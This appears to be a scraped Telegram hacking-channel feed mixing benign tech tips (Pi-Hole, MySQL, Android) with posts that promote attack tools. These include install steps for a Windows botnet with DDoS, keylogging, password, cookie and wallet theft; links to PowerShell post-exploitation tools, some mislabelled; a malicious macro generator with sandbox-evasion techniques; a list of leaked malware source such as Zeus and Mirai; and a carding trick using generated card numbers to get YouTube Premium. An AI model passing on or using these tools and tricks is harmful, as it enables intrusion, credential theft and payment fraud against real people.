UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ 2020 Free advanced and modern Windows botnet with a nice and secure PHP panel:
instagram.com/undercodeTesting

πŸ¦‘ FEATURES :

pload File
DDOS Attack [ TCP,UDP,ARME,Slowloris, HTTPGet, POSTHttp, Bandwidth Flood ]
Start DDOS
Stop DDOS
Open Webpage
Visible
Hidden
Show MessageBox
Take Screenshot
Steal Firefox Cookies
Steal Saved Passwords
Keylogger
Execute Scripts
Computer Operations
Restart
Shutdown
Logout
Bitcoint Wallet Stealer
Uninstall Client
Move Client
Blacklist Client
Update Client
Close Client

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/BlackHacker511/BlackNET

2) cd BlackNet

3) compress BlackNET panel folder and upload it to your hosting

4) Create a database with any name you want

5) Change the data in classes/Database.php

6) Change files and folders permission to 777 [ Uploads Folder, Scripts Folder ]

7) Go to install.php to create the botnet tables automatically

> use for learn only

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to use the Pi-Hole Information OLED Display with Raspberry Pi :
instagram.com/undercodeTesting

πŸ¦‘OLED Information Display: Hardware Installation
The list of necessary equipment is the most basic:

Raspberry Pi (any model, ideal with an Ethernet port)
SD card (8GB or more; with 4GB will also work)
Power Supply
Network Connection:
Ethernet cable
or built-in WiFi
or USB WiFi adapter
Monitor (optional)
Keyboard (optional)
Case for Pi (optional)

πŸ¦‘To install the information display you will need:

OLED display with I2C [ eBay ] [ AliExpress ]
Non-Locking Switch [ eBay ] [ AliExpress ]
Connection cables for connecting the display to the GPIO leg
LED and resistor (optional)
Display frame or mount (optional)

πŸ¦‘ Install and configure Pi-Hole
1) Installing a Pi-Hole is a fairly simple process. We will not even describe the whole procedure here. Instead, we briefly outline what we have done. Depending on your preference, you can use SSH or a keyboard with a monitor for installation.

2) Create a new Raspbian SD card with an image of Raspbian Lite and Etcher

3) To enable SSH, add an empty text file called β€œssh” to the boot section

4)Turn on your Pi with a new SD card

5) Change the default password to your

6)Run β€œsudo update”, then β€œsudo upgrade”

7)Get the IP address of Pi in any of the following ways:
run ifconfig on Pi

8)find it in the router settings
use a network scanner
(optional) configure your router so that it always assigns the same IP address to your Raspberry Pi

9)Follow one of the installation instructions :

>git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole

>cd "Pi-hole/automated install/"

>sudo bash basic-install.sh

E N J O Y
WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Fast Windows hacking 2020 : Exploits :
instagram.com/undercodeTesting

πŸ¦‘Lastest Exploits :

1) BloodHound : Six Degrees of Domain Admin
> https://github.com/adaptivethreat/BloodHound

2) Empire : Empire is a PowerShell and Python post-exploitation agent
> https://github.com/adaptivethreat/Empire

3) Generate-Macro : Powershell script will generate a malicious Microsoft
> https://github.com/enigma0x3/Invoke-AltDSBackdoor

4) Office document with a specified payload and persistence method
> https://github.com/enigma0x3/Old-Powershell-payload-Excel-Delivery

5) Invoke-AltDSBackdoor : This script will obtain persistence on a
Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams
> https://github.com/gfoss/PSRecon

6) Old-Powershell-payload-Excel-Delivery : This version touches disk for registry persistence
> https://github.com/FuzzySecurity/PowerShell-Suite

7) PSRecon : PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team
> https://github.com/gfoss/PSRecon

8) PowerShell-Suite : Some useful scripts in powershell
> https://github.com/FuzzySecurity/PowerShell-Suite

9) PowerSploit : A PowerShell Post-Exploitation Framework
> https://github.com/PowerShellMafia/PowerSploit

10) PowerTools : A collection of PowerShell projects with a focus on offensive operations
> https://github.com/PowerShellMafia/PowerSploit

11) Powershell-C2 : A PowerShell script to maintain persistance on a Windows machine
> https://github.com/enigma0x3/Powershell-C2

12) Powershell-Payload-Excel-Delivery : Uses Invoke-Shellcode to execute a payload and persist on the system
> https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery

13) mimikittenz : A post-exploitation powershell tool for extracting juicy info from memory.
> https://github.com/putterpanda/mimikittenz

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
> Learn how to intercept data in networks

>Monitor transmitted data

>Detect intrusions

>See what is going on in your network

>Learn how to read and filter data in Wireshark

> FREE https://www.udemy.com/share/101rG6/
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Best Paste bin alternatives :
t.me/undercodeTesting
> In case you wonder why someone is interested in sites like Pastebin, let's quickly look at what Pastebin does.

Pastebin appeared in the late 1990s and early 2000s as a way to easily share code blocks in the right format and not interrupt the flow of conversation. IRC chat rooms (Internet Relay Chat) at that time were much more rudimentary than modern chat applications like Slack or WhatsApp.

1) ControlC.com

2) Hastebin.com

3) Justpaste.me

4) PrivateBin.net

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to recover MYSQL ROOT password :
instagram.com/undercodeTesting


> If you have forgotten your MYSQL root password, you can recover it through the following procedure.

1) Send a kill command to mysqld server to turn off mysqld server (not kill -9). The file storing the process ID is usually in the directory where the MYSQL database is located.
kill cat / mysql-data-directory / hostname.pid
You must be the root user of UNIX or the equivalent user on the server you are running to perform this operation.

2) Use the '--skip-grant-tables' parameter to start mysqld.

3)Use the 'mysql -h hostname mysql' command to log in to the mysqld server, and use the grant command to change the password. You can also do this: 'mysqladmin -h hostname -u user password' new password ''.
(In fact, you can also use use mysql; update user set password = password ('yourpass') where user =' root '.)

4) Load the permission table: `mysqladmin -h hostname flush-privileges', or use SQL Command `FLUSH PRIVILEGES '. (Of course, here, you can also restart mysqld.)

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘ How to import ACCESS data into Mysql ?
twitter.com/undercodenews

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

In the process of building a website, it is often necessary to deal with the import and export of some data. In the Mysql database, there are two ways to deal with the export of data (general).

1) INTO table_name from outfile * SELECT "file_name";

2) Use mysqldump utility
Let us illustrate:
Suppose that we have a database of library samp_db, a table samp_table. Now we need to export the data of samp_table. Then we can use the following method to achieve: type
in select * from samp_table into outfile β€œfile_name” at the Mysql prompt; type
mysqldump –u root samp_db samp_table> samp.sql at the system command prompt
(of course mysqldump has many options .For example, -d means only export table structure; -t means only import table data)
How to deal with data import: Generally we enter mysqlimport –u root samp_db samp_table.txt at the system command prompt (note: this TXT file name Must be named after the table). For the data exported by mysqldump, we can also use mysql –u root samp_db <file_name to import. At the Mysql prompt, we use Load data infile β€œfile_name” into table samp_table.

3) In addition to the above methods, under the premise that the database system after the move is the same as the original system, we can import and export data by copying files. First we use mysqladmin -u root variables (at the system command prompt) or show variables; (at the Mysql prompt) to find the datadir. As in my environment, this directory is in c: mysqldata. Then copy some of the files. Everything is ok!
With the above knowledge, we enter the topic: how to import ACCESS data into Mysql.

4) so > we export the data from ACCESS to a text file. During the export process, pay attention to choose the field separator and text identifier, and check the text file to determine whether a record is on the same line. : samp_table.txt. Which reads as follows:
..

5) Next we mysqlimport -u root -fields-terminated-by = "," samp_db samp_table.txt
or use load data infile "c: \ samp_table.txt " into table samp_table fields terminated by ",";
try it (note the escape character), is everything ok! If it still doesn't work, please take a closer look at the help of specific commands. Some options are listed below:
-
-fields-enclosed-by = char indicates that the column value should be included in the specified character. Usually use quotation marks. By default, it is assumed that the column value is not included in any characters.

--fields-escaped-by = char represents the escape character used to escape special characters. By default, it means no escape character

--fields-terminated-by = char specifies the character that separates the columns. By default, column values ​​are assumed to be separated by tabs.

--lines-terminated-by = str Specifies the end of the input line string (can be multi-character). By default, the line is assumed to be terminated by a newline

Written by Undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Wiki trick- How to get youtube premium
T.me/undercodeTesting


1) Login first to your google account Then Connect the VPN to IP: India

2) Go to https://pay.google.com/ 508 CC Gen: https://namso-gen.com/ 544 (No Lives CC needed)**

3) After that go to youtube.com/premium 279

4) Click try it free

5) It will auto add the card just add the cvc 4 digits pin which is on namso-gen.com 275

6) You’re Done. Bins

β—¦ 37479000124xxxx


@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to completely change the status bar on Android without root :
t.me/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Download Super Status Bar
The app is called Super Status Bar and is available for free on the Google Play Store. All features of the program can be obtained in the paid version at a price of $ 1.99.

2) Give Permissions
When you first launch the application, the initial setup window appears. After that, click on the β€œStart” button in the main menu. On the new page, you will see two radio buttons for accessing permissions. Click on each of them and you will be taken to the corresponding settings page. Find the Super Status Bar app there and give permission.

3) Change the status bar
On the application’s main screen, select the status bar. For more significant changes, you need to purchase the Pro version, but without this you can change something.
simple trick

4) If you want to leave the standard status bar, go to the β€œChange” tab in the settings. Here you can see a list of icons that can be turned off. You can also activate hidden icons, such as "Network Speed", and expand the clock to show seconds. Available options vary by device model.

Return to the β€œCustom” tab by enabling the β€œAllow custom status panels” option. Here you can make even more changes, most of which require the Pro version. If you are not going to buy it, you can turn off the icons by selecting the system icons. Activating a custom status panel will change the color for this application, that is, to green.

5)You can always force the custom status bar to be activated, as sometimes Android automatically reverts to its original state. In this case, some applications may lose access to full-screen mode.

written bu undercode

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Malicious Macro Generator lastest :
instagram.com/undercodeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) git clone https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator

2) cd MaliciousMacroGenerator

3) MMG.Malicious Macro Generator v2.0 - RingZer0 Team
Author: Mr.Un1k0d3r mr.un1k0d3r@gmail.com

Usage: MMG.py [config] [output] (optional parameters)

[config] Config file that contain generator information
[output] Output filename for the macro

-l --list List of all available payloads and evasion techniques
-s --split_strings Randomly split strings at parts
-x --strings_to_hex Encode strings to hex

python MMG.py configs/generic-cmd.json malicious.vba

πŸ¦‘ Evasion techniques
Domain check
The macro is fetching the USERDOMAIN environment variable and compare the value with a predefined one. If they match the final payload is executed.

Disk check
The macro is looking for the total disk space. VMs and test machines use small disk most of the time.

Memory check
The macro is looking for the total memory size. Vms and test machines use less resources.

Uptime check
The macro is looking for the system uptime. Sandboxes will return a short uptime.

Process check
The macro is checking if a specific process is running (example outlook.exe)

Obfuscation
The python script will also generate obfuscated code to avoid heuristic detection

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Original Resolution (size) Compressed Resolution (size)
by whastsapp @undercode


1280x720 (421 KB) 800x450 (45 KB)

1280x1024 (153 KB) 800x640 (84 KB)

1024x768 (137 KB) 800x600 (64 KB)

3264x2448 (3 MB) 800x600 (69 KB)

800x600 (226 KB) 800x600 (68 KB)

480x360 (30 KB) 480x360 (21 KB)

400x300 (24 KB) 400x300 (22 KB)

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ LEAKED TOOLS UPLOADED FROM DEEP WEB TO GITHUB :

Alina Spark (Point of Sales Trojan)
Betabot, Neurevt (Trojan)
Bleeding Life 2 (Exploit Pack)
Carberp (Botnet)
Carberp (Banking Trojan)
Crimepack 3.1.3 (Exploit Pack)
Dendroid (Android Trojan)
Dexter v2 (Point of Sales Trojan)
Eda2, Stolich, Win32.Stolich (Ransom)
Sednit, Fancy Bear, APT28, Sofacy, Strontium (Gmail C2C)
FlexiSpy (Spyware)
Fuzzbunch (Exploit Framework)
GMBot (Android Trojan)
Gozi-ISFB - (Banking Trojan)
Grum (Spam Bot)
Hacking Team RCS (Remote Control System)
Hidden Tear (Ransom)
KINS (Banking Trojan)
Mazar (Android Trojan)
Mirai (IoT Botnet)
Pony 2.0 (Stealer)
Poshspy (APT29 backdoor)
PowerLoader (Botnet)
RIG Front-end (Exploit Kit)
Rovnix (Bootkit)
Tinba (Tiny ASM Banking Trojan)
TinyNuke, Nuclear Bot, Micro Banking Trojan, NukeBot (Banking Trojan)
Trochilus, RedLeaves (RAT)
ZeroAccess (Toolkit for ZeroAccess/Sirefef v3)
Zeus (Banking Trojan)

> get clone before ban
https://github.com/m0n0ph1/malware-1
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁